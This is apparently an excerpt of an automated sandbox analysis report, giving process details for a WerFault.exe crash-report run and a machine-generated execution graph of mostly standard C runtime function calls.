                                                                                                                                                                        Start date:07/11/2022
                                                                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5840 -s 94748
                                                                                                                                                                        Imagebase:0x1030000
                                                                                                                                                                        File size:434592 bytes
                                                                                                                                                                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high

                                                                                                                                                                        Disassembly

                                                                                                                                                                        Reset < >

                                                                                                                                                                          Execution Graph

                                                                                                                                                                          Execution Coverage:6.5%
                                                                                                                                                                          Dynamic/Decrypted Code Coverage:7.7%
                                                                                                                                                                          Signature Coverage:2.8%
                                                                                                                                                                          Total number of Nodes:2000
                                                                                                                                                                          Total number of Limit Nodes:52
                                                                                                                                                                          execution_graph 19147 9f1096 19152 9f69ee 19147->19152 19153 9f69fe 19152->19153 19154 9f109b 19152->19154 19153->19154 19159 9f85c2 InitializeCriticalSectionEx 19153->19159 19156 9f8f68 19154->19156 19160 9f8f3b 19156->19160 19159->19153 19161 9f8f4a 19160->19161 19162 9f8f51 19160->19162 19166 a0328c 19161->19166 19169 a032f8 19162->19169 19165 9f10a5 19167 a032f8 29 API calls 19166->19167 19168 a0329e 19167->19168 19168->19165 19172 a0302e 19169->19172 19173 a0303a CallCatchBlock 19172->19173 19180 9fe1b2 EnterCriticalSection 19173->19180 19175 a03048 19181 a03089 19175->19181 19177 a03055 19191 a0307d 19177->19191 19180->19175 19182 a030a5 19181->19182 19183 a0311c std::_Lockit::_Lockit 19181->19183 19182->19183 19190 a030fc 19182->19190 19194 a0ee63 19182->19194 19183->19177 19185 a0ee63 29 API calls 19187 a03112 19185->19187 19186 a030f2 19188 a0447f _free 15 API calls 19186->19188 19189 a0447f _free 15 API calls 19187->19189 19188->19190 19189->19183 19190->19183 19190->19185 19222 9fe1fa LeaveCriticalSection 19191->19222 19193 a03066 19193->19165 19195 a0ee70 19194->19195 19196 a0ee8b 19194->19196 19195->19196 19198 a0ee7c 19195->19198 19197 a0ee9a 19196->19197 19203 a1247f 19196->19203 19210 a09904 19197->19210 19200 9febab __dosmaperr 15 API calls 19198->19200 19202 a0ee81 __fread_nolock 19200->19202 19202->19186 19204 a1248a 19203->19204 19205 a1249f HeapSize 19203->19205 19206 9febab __dosmaperr 15 API calls 19204->19206 19205->19197 19207 a1248f 19206->19207 19208 9fcbcf __strnicoll 26 API calls 19207->19208 19209 a1249a 19208->19209 19209->19197 19211 a09911 19210->19211 19212 a0991c 19210->19212 19214 a04e1f __strnicoll 16 API calls 19211->19214 19213 a09924 19212->19213 19220 a0992d __dosmaperr 19212->19220 19215 a0447f _free 15 API calls 19213->19215 19218 a09919 19214->19218 19215->19218 19216 a09932 19219 9febab __dosmaperr 15 API calls 19216->19219 19217 a09957 HeapReAlloc 19217->19218 19217->19220 19218->19202 19219->19218 19220->19216 19220->19217 19221 a00cac std::ios_base::_Init 2 API calls 19220->19221 19221->19220 19222->19193 19223 9fec96 19224 9ff135 ___scrt_uninitialize_crt 67 API calls 19223->19224 19225 9fec9e 19224->19225 19233 a074a4 19225->19233 19227 9feca3 19243 a0754f 19227->19243 19230 9feccd 19231 a0447f _free 15 API calls 19230->19231 19232 9fecd8 19231->19232 19234 a074b0 CallCatchBlock 19233->19234 19247 9fe1b2 EnterCriticalSection 19234->19247 19236 a07527 19261 a07546 19236->19261 19239 a074fb DeleteCriticalSection 19241 a0447f _free 15 API calls 19239->19241 19242 a074bb 19241->19242 19242->19236 19242->19239 19248 9fedc7 19242->19248 19244 a07566 19243->19244 19245 9fecb2 DeleteCriticalSection 19243->19245 19244->19245 19246 a0447f _free 15 API calls 19244->19246 19245->19227 19245->19230 19246->19245 19247->19242 19249 9fedd3 CallCatchBlock 19248->19249 19250 9feddd 19249->19250 19251 9fedf2 19249->19251 19252 9febab __dosmaperr 15 API calls 19250->19252 19258 9feded 19251->19258 19264 9fed28 EnterCriticalSection 19251->19264 19254 9fede2 19252->19254 19256 9fcbcf __strnicoll 26 API calls 19254->19256 19255 9fee0f 19265 9fed50 19255->19265 19256->19258 19258->19242 19259 9fee1a 19281 9fee41 19259->19281 19340 9fe1fa LeaveCriticalSection 19261->19340 19263 a07533 19263->19227 19264->19255 19266 9fed5d 19265->19266 19267 9fed72 19265->19267 19268 9febab __dosmaperr 15 API calls 19266->19268 19270 9ff088 ___scrt_uninitialize_crt 63 API calls 19267->19270 19273 9fed6d 19267->19273 19269 9fed62 19268->19269 19271 9fcbcf __strnicoll 26 API calls 19269->19271 19272 9fed87 19270->19272 19271->19273 19274 a0754f 15 API calls 19272->19274 19273->19259 19275 9fed8f 19274->19275 19276 a05cb7 _Fputc 26 API calls 19275->19276 19277 9fed95 19276->19277 19284 a0761b 19277->19284 19280 a0447f _free 15 API calls 19280->19273 19339 9fed3c LeaveCriticalSection 19281->19339 19283 9fee49 19283->19258 19285 a07641 19284->19285 19286 a0762c 19284->19286 19288 a0768a 19285->19288 19293 a07668 19285->19293 19287 9feb98 __dosmaperr 15 API calls 19286->19287 19290 a07631 19287->19290 19289 9feb98 __dosmaperr 15 API calls 19288->19289 19291 a0768f 19289->19291 19292 9febab __dosmaperr 15 API calls 19290->19292 19295 9febab __dosmaperr 15 API calls 19291->19295 19296 9fed9b 19292->19296 19299 a0758f 19293->19299 19297 a07697 19295->19297 19296->19273 19296->19280 19298 9fcbcf __strnicoll 26 API calls 19297->19298 19298->19296 19300 a0759b CallCatchBlock 19299->19300 19310 a0ca49 EnterCriticalSection 19300->19310 19302 a075a9 19303 a075d0 19302->19303 19304 a075db 19302->19304 19311 a076a8 19303->19311 19306 9febab __dosmaperr 15 API calls 19304->19306 19307 a075d6 19306->19307 19326 a0760f 19307->19326 19310->19302 19312 a0cb20 __fread_nolock 26 API calls 19311->19312 19315 a076b8 19312->19315 19313 a076be 19329 a0ca8f 19313->19329 19315->19313 19316 a0cb20 __fread_nolock 26 API calls 19315->19316 19325 a076f0 19315->19325 19320 a076e7 19316->19320 19317 a0cb20 __fread_nolock 26 API calls 19321 a076fc CloseHandle 19317->19321 19319 a07738 19319->19307 19324 a0cb20 __fread_nolock 26 API calls 19320->19324 19321->19313 19322 a07708 GetLastError 19321->19322 19322->19313 19323 9feb75 __dosmaperr 15 API calls 19323->19319 19324->19325 19325->19313 19325->19317 19338 a0ca6c LeaveCriticalSection 19326->19338 19328 a075f8 19328->19296 19330 a0cb05 19329->19330 19331 a0ca9e 19329->19331 19332 9febab __dosmaperr 15 API calls 19330->19332 19331->19330 19337 a0cac8 19331->19337 19333 a0cb0a 19332->19333 19334 9feb98 __dosmaperr 15 API calls 19333->19334 19335 a07716 19334->19335 19335->19319 19335->19323 19336 a0caef SetStdHandle 19336->19335 19337->19335 19337->19336 19338->19328 19339->19283 19340->19263 19347 9f4690 19348 9f46d0 19347->19348 19353 9f69c0 19348->19353 19352 9f4745 19354 9f69d8 19353->19354 19380 9fe125 19354->19380 19357 9f3b60 19358 9f3b73 19357->19358 19359 9f1480 70 API calls 19358->19359 19360 9f3bd1 19359->19360 19793 9f18c0 19360->19793 19362 9f3bfb 19802 9f16f0 19362->19802 19364 9f3cc5 19365 9f3d9e 19364->19365 19366 9f3cf3 19364->19366 19367 9f3f40 66 API calls 19365->19367 19368 9f3d4c 19366->19368 19369 9f3cfa 19366->19369 19372 9f3d47 19367->19372 19371 9f3f40 66 API calls 19368->19371 19848 9f3f40 19369->19848 19370 9f3c39 19370->19364 19835 9f55e0 19370->19835 19371->19372 19374 9f3f40 66 API calls 19372->19374 19376 9f3df9 std::ios_base::_Ios_base_dtor 19374->19376 19377 9f3e9e std::ios_base::_Ios_base_dtor 19376->19377 19378 9fcbdf std::ios_base::_Init 26 API calls 19376->19378 19377->19352 19379 9f3eb7 19378->19379 19383 9fcf14 19380->19383 19382 9f471e 19382->19357 19384 9fcf1f 19383->19384 19385 9fcf34 19383->19385 19387 9febab __dosmaperr 15 API calls 19384->19387 19386 9fcf76 19385->19386 19388 9fcf42 19385->19388 19389 9febab __dosmaperr 15 API calls 19386->19389 19390 9fcf24 19387->19390 19399 9fcd96 19388->19399 19394 9fcf6e 19389->19394 19392 9fcbcf __strnicoll 26 API calls 19390->19392 19395 9fcf2f 19392->19395 19396 9fcbcf __strnicoll 26 API calls 19394->19396 19395->19382 19397 9fcf86 19396->19397 19397->19382 19398 9febab __dosmaperr 15 API calls 19398->19394 19400 9fcdbe 19399->19400 19401 9fcdd6 19399->19401 19402 9febab __dosmaperr 15 API calls 19400->19402 19401->19400 19403 9fcdde 19401->19403 19404 9fcdc3 19402->19404 19405 9fd21e __strnicoll 38 API calls 19403->19405 19406 9fcbcf __strnicoll 26 API calls 19404->19406 19408 9fcdee 19405->19408 19412 9fcdce 19406->19412 19407 9f8f7d __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 19409 9fcef6 19407->19409 19414 9fd489 19408->19414 19409->19397 19409->19398 19412->19407 19431 9fdf77 19414->19431 19416 9fd4a9 19417 9febab __dosmaperr 15 API calls 19416->19417 19419 9fd4ae 19417->19419 19418 9fce75 19428 9fd2b1 19418->19428 19420 9fcbcf __strnicoll 26 API calls 19419->19420 19420->19418 19422 9fd49a 19422->19416 19422->19418 19438 9fd5ea 19422->19438 19446 9fda3d 19422->19446 19451 9fd697 19422->19451 19456 9fd6bd 19422->19456 19485 9fd80b 19422->19485 19507 9fdf92 19422->19507 19429 a0447f _free 15 API calls 19428->19429 19430 9fd2c1 19429->19430 19430->19412 19432 9fdf8f 19431->19432 19433 9fdf7c 19431->19433 19432->19422 19434 9febab __dosmaperr 15 API calls 19433->19434 19435 9fdf81 19434->19435 19436 9fcbcf __strnicoll 26 API calls 19435->19436 19437 9fdf8c 19436->19437 19437->19422 19514 9fd609 19438->19514 19440 9fd5ef 19441 9fd606 19440->19441 19442 9febab __dosmaperr 15 API calls 19440->19442 19441->19422 19443 9fd5f8 19442->19443 19444 9fcbcf __strnicoll 26 API calls 19443->19444 19445 9fd603 19444->19445 19445->19422 19447 9fda4d 19446->19447 19448 9fda46 19446->19448 19447->19422 19523 9fd415 19448->19523 19452 9fd6a0 19451->19452 19454 9fd6a7 19451->19454 19453 9fd415 41 API calls 19452->19453 19455 9fd6a6 19453->19455 19454->19422 19455->19422 19457 9fd6de 19456->19457 19458 9fd6c4 19456->19458 19459 9febab __dosmaperr 15 API calls 19457->19459 19462 9fd70e 19457->19462 19460 9fd824 19458->19460 19461 9fd890 19458->19461 19458->19462 19463 9fd6fa 19459->19463 19472 9fd867 19460->19472 19476 9fd830 19460->19476 19464 9fd897 19461->19464 19465 9fd8d6 19461->19465 19461->19472 19462->19422 19466 9fcbcf __strnicoll 26 API calls 19463->19466 19469 9fd83e 19464->19469 19470 9fd89c 19464->19470 19594 9fdeee 19465->19594 19468 9fd705 19466->19468 19468->19422 19474 9fd860 19469->19474 19483 9fd84c 19469->19483 19588 9fdb26 19469->19588 19470->19472 19475 9fd8a1 19470->19475 19472->19474 19472->19483 19579 9fdd0a 19472->19579 19473 9fd877 19473->19474 19565 9fdc77 19473->19565 19474->19422 19478 9fd8a6 19475->19478 19479 9fd8b4 19475->19479 19476->19469 19476->19473 19476->19483 19478->19474 19569 9fdecf 19478->19569 19573 9fde5b 19479->19573 19483->19474 19597 9fdff7 19483->19597 19486 9fd824 19485->19486 19487 9fd890 19485->19487 19495 9fd867 19486->19495 19498 9fd830 19486->19498 19488 9fd897 19487->19488 19489 9fd8d6 19487->19489 19487->19495 19490 9fd83e 19488->19490 19491 9fd89c 19488->19491 19492 9fdeee 27 API calls 19489->19492 19493 9fdb26 41 API calls 19490->19493 19497 9fd860 19490->19497 19505 9fd84c 19490->19505 19494 9fd8a1 19491->19494 19491->19495 19492->19505 19493->19505 19500 9fd8a6 19494->19500 19501 9fd8b4 19494->19501 19495->19497 19499 9fdd0a 27 API calls 19495->19499 19495->19505 19496 9fd877 19496->19497 19503 9fdc77 40 API calls 19496->19503 19497->19422 19498->19490 19498->19496 19498->19505 19499->19505 19500->19497 19504 9fdecf 27 API calls 19500->19504 19502 9fde5b 26 API calls 19501->19502 19502->19505 19503->19505 19504->19505 19505->19497 19506 9fdff7 40 API calls 19505->19506 19506->19497 19508 9fdf98 19507->19508 19509 9fdfb1 19507->19509 19508->19509 19510 9febab __dosmaperr 15 API calls 19508->19510 19509->19422 19511 9fdfa3 19510->19511 19512 9fcbcf __strnicoll 26 API calls 19511->19512 19513 9fdfae 19512->19513 19513->19422 19517 9fd633 19514->19517 19516 9fd615 19516->19440 19518 9fd655 __fassign 19517->19518 19519 9febab __dosmaperr 15 API calls 19518->19519 19522 9fd68c 19518->19522 19520 9fd681 19519->19520 19521 9fcbcf __strnicoll 26 API calls 19520->19521 19521->19522 19522->19516 19524 9fd427 19523->19524 19525 9fd42c 19523->19525 19526 9febab __dosmaperr 15 API calls 19524->19526 19531 a04e6d 19525->19531 19526->19525 19529 9febab __dosmaperr 15 API calls 19530 9fd45e 19529->19530 19530->19422 19532 a04e88 19531->19532 19535 a0358e 19532->19535 19536 9fdf77 std::_Locinfo::_Locinfo_ctor 26 API calls 19535->19536 19539 a035a0 19536->19539 19537 a035d9 19538 9fd21e __strnicoll 38 API calls 19537->19538 19545 a035e5 19538->19545 19539->19537 19540 a035b5 19539->19540 19552 9fd44a 19539->19552 19541 9febab __dosmaperr 15 API calls 19540->19541 19542 a035ba 19541->19542 19544 9fcbcf __strnicoll 26 API calls 19542->19544 19544->19552 19547 a03614 19545->19547 19553 a0053f 19545->19553 19546 a004e8 26 API calls 19550 a03744 std::_Locinfo::_Locinfo_ctor 19546->19550 19549 a0367e 19547->19549 19559 a004e8 19547->19559 19549->19546 19551 9febab __dosmaperr 15 API calls 19550->19551 19550->19552 19551->19552 19552->19529 19552->19530 19554 a0057c 19553->19554 19557 a0054c 19553->19557 19556 9fe4c0 __Getctype 38 API calls 19554->19556 19555 a0055b __fassign 19555->19545 19556->19555 19557->19555 19558 a06db0 41 API calls 19557->19558 19558->19555 19560 a004f9 19559->19560 19561 a0050d 19559->19561 19560->19561 19562 9febab __dosmaperr 15 API calls 19560->19562 19561->19549 19563 a00502 19562->19563 19564 9fcbcf __strnicoll 26 API calls 19563->19564 19564->19561 19567 9fdc92 19565->19567 19566 9fdcc7 19566->19483 19567->19566 19603 a04ff3 19567->19603 19570 9fdedb 19569->19570 19571 9fdd0a 27 API calls 19570->19571 19572 9fdeed 19571->19572 19572->19483 19578 9fde70 19573->19578 19574 9febab __dosmaperr 15 API calls 19575 9fde79 19574->19575 19576 9fcbcf __strnicoll 26 API calls 19575->19576 19577 9fde84 19576->19577 19577->19483 19578->19574 19578->19577 19580 9fdd1d 19579->19580 19581 9fdd38 19580->19581 19583 9fdd4f 19580->19583 19582 9febab __dosmaperr 15 API calls 19581->19582 19584 9fdd3d 19582->19584 19587 9fdd48 19583->19587 19635 9fcfa4 19583->19635 19585 9fcbcf __strnicoll 26 API calls 19584->19585 19585->19587 19587->19483 19589 9fdb3f 19588->19589 19590 9fcfa4 16 API calls 19589->19590 19591 9fdb7c 19590->19591 19648 a05b5b 19591->19648 19593 9fdbf4 19593->19483 19593->19593 19595 9fdd0a 27 API calls 19594->19595 19596 9fdf05 19595->19596 19596->19483 19598 9fe068 19597->19598 19602 9fe014 19597->19602 19599 9f8f7d __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 19598->19599 19601 9fe098 19599->19601 19600 a04ff3 40 API calls 19600->19602 19601->19474 19602->19598 19602->19600 19604 a05003 19603->19604 19605 a05041 19604->19605 19606 a0502d 19604->19606 19618 a05008 19604->19618 19608 9fd21e __strnicoll 38 API calls 19605->19608 19607 9febab __dosmaperr 15 API calls 19606->19607 19610 a05032 19607->19610 19609 a0504c 19608->19609 19611 a05088 19609->19611 19612 a0505c 19609->19612 19613 9fcbcf __strnicoll 26 API calls 19610->19613 19615 a05090 19611->19615 19617 a0b091 std::_Locinfo::_Locinfo_ctor WideCharToMultiByte 19611->19617 19628 a0f60f 19612->19628 19613->19618 19624 a0509e __fread_nolock 19615->19624 19627 a050d5 __fread_nolock 19615->19627 19619 a05105 19617->19619 19618->19566 19621 a05119 GetLastError 19619->19621 19619->19624 19620 9febab __dosmaperr 15 API calls 19620->19618 19621->19624 19621->19627 19622 9febab __dosmaperr 15 API calls 19622->19618 19623 9febab __dosmaperr 15 API calls 19625 a0513f 19623->19625 19624->19618 19624->19620 19626 9fcbcf __strnicoll 26 API calls 19625->19626 19626->19618 19627->19618 19627->19623 19629 a0f62a 19628->19629 19631 a05071 19628->19631 19629->19631 19632 a0f6ba 19629->19632 19631->19618 19631->19622 19633 9febab __dosmaperr 15 API calls 19632->19633 19634 a0f6ce 19633->19634 19634->19631 19636 9fcfb9 19635->19636 19639 9fcfc8 19635->19639 19637 9febab __dosmaperr 15 API calls 19636->19637 19638 9fcfbe 19637->19638 19638->19587 19639->19638 19640 a04e1f __strnicoll 16 API calls 19639->19640 19641 9fcfef 19640->19641 19642 9fd006 19641->19642 19645 9fd2cb 19641->19645 19644 a0447f _free 15 API calls 19642->19644 19644->19638 19646 a0447f _free 15 API calls 19645->19646 19647 9fd2da 19646->19647 19647->19642 19649 a05b81 19648->19649 19650 a05b6b 19648->19650 19649->19650 19655 a05b93 19649->19655 19651 9febab __dosmaperr 15 API calls 19650->19651 19652 a05b70 19651->19652 19653 9fcbcf __strnicoll 26 API calls 19652->19653 19654 a05b7a 19653->19654 19654->19593 19656 a05bfe 19655->19656 19658 a05bcf 19655->19658 19657 a05c27 19656->19657 19659 a05c2c 19656->19659 19662 a05c50 19657->19662 19663 a05c92 19657->19663 19669 a059ff 19658->19669 19677 a052ad 19659->19677 19665 a05c74 19662->19665 19666 a05c55 19662->19666 19705 a055bc 19663->19705 19698 a057ac 19665->19698 19688 a05935 19666->19688 19670 a05a15 19669->19670 19671 a05a20 19669->19671 19670->19654 19672 a03503 std::bad_exception::bad_exception 26 API calls 19671->19672 19673 a05a7b 19672->19673 19674 a05a85 19673->19674 19675 9fcbfc __Getctype 11 API calls 19673->19675 19674->19654 19676 a05a93 19675->19676 19678 a052bf 19677->19678 19679 9fd21e __strnicoll 38 API calls 19678->19679 19680 a052d3 19679->19680 19681 a052db 19680->19681 19682 a052ef 19680->19682 19683 9febab __dosmaperr 15 API calls 19681->19683 19685 a055bc 40 API calls 19682->19685 19687 a052ea __alldvrm __fread_nolock _strrchr 19682->19687 19684 a052e0 19683->19684 19686 9fcbcf __strnicoll 26 API calls 19684->19686 19685->19687 19686->19687 19687->19654 19713 a0f83a 19688->19713 19699 a0f83a 28 API calls 19698->19699 19700 a057d9 19699->19700 19701 a0f75e 26 API calls 19700->19701 19702 a05817 19701->19702 19703 a0583d 38 API calls 19702->19703 19704 a0581e 19702->19704 19703->19704 19704->19654 19706 a055d4 19705->19706 19707 a0f83a 28 API calls 19706->19707 19708 a055ed 19707->19708 19709 a0f75e 26 API calls 19708->19709 19710 a05638 19709->19710 19711 a05664 38 API calls 19710->19711 19712 a0563f 19710->19712 19711->19712 19712->19654 19714 a0f86e 19713->19714 19715 a03468 26 API calls 19714->19715 19716 a0f8d7 19715->19716 19717 a0f903 19716->19717 19723 a0f930 19716->19723 19718 a03503 std::bad_exception::bad_exception 26 API calls 19717->19718 19719 a0f920 19718->19719 19720 a10d34 19719->19720 19725 a0f92b 19719->19725 19722 9fcbfc __Getctype 11 API calls 19720->19722 19721 a03503 std::bad_exception::bad_exception 26 API calls 19721->19719 19724 a10d40 19722->19724 19727 a10cd3 19723->19727 19728 a0f96b 19723->19728 19726 9f8f7d __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 19725->19726 19729 a05963 19726->19729 19727->19721 19730 a12710 22 API calls 19728->19730 19731 a0f9f1 19730->19731 19732 a12820 __floor_pentium4 22 API calls 19731->19732 19733 a0f9fb 19732->19733 19794 9f18ff 19793->19794 19795 9f18e1 __fread_nolock 19793->19795 19796 9f1957 19794->19796 19797 9f1907 19794->19797 19795->19362 19798 9f4070 std::ios_base::_Init 28 API calls 19796->19798 19800 9f4090 std::ios_base::_Init 17 API calls 19797->19800 19799 9f195c 19798->19799 19801 9f1930 __fread_nolock 19800->19801 19801->19362 19803 9f6a1b std::_Lockit::_Lockit 7 API calls 19802->19803 19804 9f170a 19803->19804 19805 9f6a1b std::_Lockit::_Lockit 7 API calls 19804->19805 19810 9f1745 19804->19810 19807 9f1724 19805->19807 19806 9f178d 19808 9f6a73 std::_Lockit::~_Lockit 2 API calls 19806->19808 19811 9f6a73 std::_Lockit::~_Lockit 2 API calls 19807->19811 19809 9f189f 19808->19809 19809->19370 19810->19806 19812 9f89cd std::ios_base::_Init 17 API calls 19810->19812 19811->19810 19813 9f179b 19812->19813 19815 9f19a0 codecvt 69 API calls 19813->19815 19833 9f1851 19813->19833 19814 9f1880 19817 9f6d66 std::_Facet_Register 17 API calls 19814->19817 19818 9f17d1 19815->19818 19816 9f2e10 codecvt 66 API calls 19816->19814 19817->19806 19852 9fe149 19818->19852 19833->19814 19833->19816 19836 9f577b 19835->19836 19837 9f55f7 19835->19837 19876 9f4080 19836->19876 19839 9f560b _Yarn __fread_nolock 19837->19839 19840 9f5780 19837->19840 19843 9f5657 19837->19843 19839->19370 19841 9f4070 std::ios_base::_Init 28 API calls 19840->19841 19842 9f56a2 _Yarn __fread_nolock 19841->19842 19844 9fcbdf std::ios_base::_Init 26 API calls 19842->19844 19847 9f5724 std::ios_base::_Ios_base_dtor _Yarn __fread_nolock 19842->19847 19845 9f4090 std::ios_base::_Init 17 API calls 19843->19845 19846 9f578a 19844->19846 19845->19842 19847->19370 19849 9f3f4e 19848->19849 19850 9f3fa5 19848->19850 19849->19850 19851 9f7bc5 66 API calls 19849->19851 19850->19372 19851->19849 19853 a041d0 __Getctype 38 API calls 19852->19853 19854 9fe154 19853->19854 19855 a0514e __Getctype 38 API calls 19854->19855 19856 9f17df 19855->19856 19857 9f7116 19856->19857 19858 9f7129 __fread_nolock 19857->19858 19859 9fe604 __Getctype 38 API calls 19858->19859 19860 9f7131 19859->19860 19871 9fe650 19860->19871 19863 9fe629 __Getctype 38 API calls 19864 9f7140 19863->19864 19865 9fe4c0 __Getctype 38 API calls 19864->19865 19866 9f17e9 19864->19866 19865->19866 19872 a041d0 __Getctype 38 API calls 19871->19872 19873 9fe65b 19872->19873 19874 a0514e __Getctype 38 API calls 19873->19874 19875 9f7138 19874->19875 19875->19863 19879 9f6bc2 19876->19879 19884 9f6b1a 19879->19884 19882 9f98bf Concurrency::cancel_current_task RaiseException 19883 9f6be1 19882->19883 19885 9f1cf0 std::invalid_argument::invalid_argument 27 API calls 19884->19885 19886 9f6b2c 19885->19886 19886->19882 17729 9f8b8e 17734 9f9307 SetUnhandledExceptionFilter 17729->17734 17731 9f8b93 17735 a02f9e 17731->17735 17733 9f8b9e 17734->17731 17736 a02fc4 17735->17736 17737 a02faa 17735->17737 17736->17733 17737->17736 17738 9febab __dosmaperr 15 API calls 17737->17738 17739 a02fb4 17738->17739 17740 9fcbcf __strnicoll 26 API calls 17739->17740 17741 a02fbf 17740->17741 17741->17733 21770 9f7fb2 21771 9f7fbe __EH_prolog3_GS 21770->21771 21773 9f800a 21771->21773 21774 9f8023 21771->21774 21779 9f7fd5 std::ios_base::_Ios_base_dtor 21771->21779 21784 9f7287 21773->21784 21787 9ff1cf 21774->21787 21811 9f8f9f 21779->21811 21780 9f8040 21780->21779 21782 9ff1cf 28 API calls 21780->21782 21783 9f8113 21780->21783 21807 9f7d57 21780->21807 21781 9fffc1 28 API calls 21781->21783 21782->21780 21783->21779 21783->21781 21785 9ff1cf 28 API calls 21784->21785 21786 9f7292 21785->21786 21786->21779 21788 9ff1db CallCatchBlock 21787->21788 21789 9ff1fd 21788->21789 21790 9ff1e5 21788->21790 21814 9fed28 EnterCriticalSection 21789->21814 21791 9febab __dosmaperr 15 API calls 21790->21791 21794 9ff1ea 21791->21794 21793 9ff207 21795 9ff2a0 21793->21795 21797 a05cb7 _Fputc 26 API calls 21793->21797 21796 9fcbcf __strnicoll 26 API calls 21794->21796 21815 9ff193 21795->21815 21806 9ff1f5 _Fputc 21796->21806 21801 9ff221 21797->21801 21799 9ff2a6 21822 9ff2cd 21799->21822 21801->21795 21802 9ff278 21801->21802 21803 9febab __dosmaperr 15 API calls 21802->21803 21804 9ff27d 21803->21804 21805 9fcbcf __strnicoll 26 API calls 21804->21805 21805->21806 21806->21780 21808 9f7d7e 21807->21808 21809 9f7d63 21807->21809 21826 9f72c1 21808->21826 21809->21780 21812 9f8f7d __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 21811->21812 21813 9f8185 21812->21813 21814->21793 21816 9ff19f 21815->21816 21817 9ff1b4 __fread_nolock 21815->21817 21818 9febab __dosmaperr 15 API calls 21816->21818 21817->21799 21819 9ff1a4 21818->21819 21820 9fcbcf __strnicoll 26 API calls 21819->21820 21821 9ff1af 21820->21821 21821->21799 21825 9fed3c LeaveCriticalSection 21822->21825 21824 9ff2d5 21824->21806 21825->21824 21827 9f735c 21826->21827 21828 9f72e0 21826->21828 21829 9f4070 std::ios_base::_Init 28 API calls 21827->21829 21833 9f1380 21828->21833 21830 9f7361 21829->21830 21832 9f72fc _Yarn 21832->21809 21834 9f138b 21833->21834 21839 9f139c 21833->21839 21835 9f1396 21834->21835 21836 9f4030 std::ios_base::_Init 21834->21836 21837 9f89cd std::ios_base::_Init 17 API calls 21835->21837 21838 9f98bf Concurrency::cancel_current_task RaiseException 21836->21838 21837->21839 21840 9f404a 21838->21840 21839->21832 20262 a04097 20263 a040a2 20262->20263 20264 a040b2 20262->20264 20268 a040b8 20263->20268 20267 a0447f _free 15 API calls 20267->20264 20269 a040d3 20268->20269 20270 a040cd 20268->20270 20272 a0447f _free 15 API calls 20269->20272 20271 a0447f _free 15 API calls 20270->20271 20271->20269 20273 a040df 20272->20273 20274 a0447f _free 15 API calls 20273->20274 20275 a040ea 20274->20275 20276 a0447f _free 15 API calls 20275->20276 20277 a040f5 20276->20277 20278 a0447f _free 15 API calls 20277->20278 20279 a04100 20278->20279 20280 a0447f _free 15 API calls 20279->20280 20281 a0410b 20280->20281 20282 a0447f _free 15 API calls 20281->20282 20283 a04116 20282->20283 20284 a0447f _free 15 API calls 20283->20284 20285 a04121 20284->20285 20286 a0447f _free 15 API calls 20285->20286 20287 a0412c 20286->20287 20288 a0447f _free 15 API calls 20287->20288 20289 a0413a 20288->20289 20294 a03ee4 20289->20294 20295 a03ef0 CallCatchBlock 20294->20295 20310 9fe1b2 EnterCriticalSection 20295->20310 20298 a03efa 20300 a0447f _free 15 API calls 20298->20300 20301 a03f24 20298->20301 20300->20301 20311 a03f43 20301->20311 20302 a03f4f 20303 a03f5b CallCatchBlock 20302->20303 20315 9fe1b2 EnterCriticalSection 20303->20315 20305 a03f65 20306 a04185 __dosmaperr 15 API calls 20305->20306 20307 a03f78 20306->20307 20316 a03f98 20307->20316 20310->20298 20314 9fe1fa LeaveCriticalSection 20311->20314 20313 a03f31 20313->20302 20314->20313 20315->20305 20319 9fe1fa LeaveCriticalSection 20316->20319 20318 a03f86 20318->20267 20319->20318 17742 9f8ba0 17743 9f8bac CallCatchBlock 17742->17743 17768 9f8da2 17743->17768 17745 9f8bb3 17746 9f8d0c 17745->17746 17756 9f8bdd ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock CallCatchBlock 17745->17756 17815 9f91a4 IsProcessorFeaturePresent 17746->17815 17748 9f8d13 17819 a017f7 17748->17819 17751 a017bb CallCatchBlock 24 API calls 17752 9f8d21 17751->17752 17753 9f8bfc 17754 9f8c7d 17779 a014cf 17754->17779 17756->17753 17756->17754 17800 a017d1 17756->17800 17758 9f8c83 17783 9f5fd0 GetModuleHandleA 17758->17783 17769 9f8dab 17768->17769 17822 9f9415 IsProcessorFeaturePresent 17769->17822 17773 9f8dbc 17778 9f8dc0 17773->17778 17832 a03426 17773->17832 17776 9f8dd7 17776->17745 17778->17745 17780 a014d8 17779->17780 17782 a014dd 17779->17782 17960 a01233 17780->17960 17782->17758 17784 9f5fe6 17783->17784 17785 9f6000 GetProcAddress 17783->17785 18357 9f1150 17784->18357 17789 9f5ffb 17785->17789 18218 9f2ef0 17789->18218 17801 a017e7 std::_Lockit::_Lockit CallCatchBlock 17800->17801 17801->17754 17802 a041d0 __Getctype 38 API calls 17801->17802 17805 a034d8 17802->17805 17803 a007e9 IsInExceptionSpec 38 API calls 17804 a03502 17803->17804 17805->17803 17816 9f91ba __fread_nolock CallCatchBlock 17815->17816 17817 9f9265 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17816->17817 17818 9f92b0 CallCatchBlock 17817->17818 17818->17748 17820 a01695 CallCatchBlock 24 API calls 17819->17820 17821 9f8d19 17820->17821 17821->17751 17823 9f8db7 17822->17823 17824 9fb64e 17823->17824 17841 9fc717 17824->17841 17827 9fb657 17827->17773 17829 9fb65f 17830 9fb66a 17829->17830 17855 9fc753 17829->17855 17830->17773 17897 a0eeeb 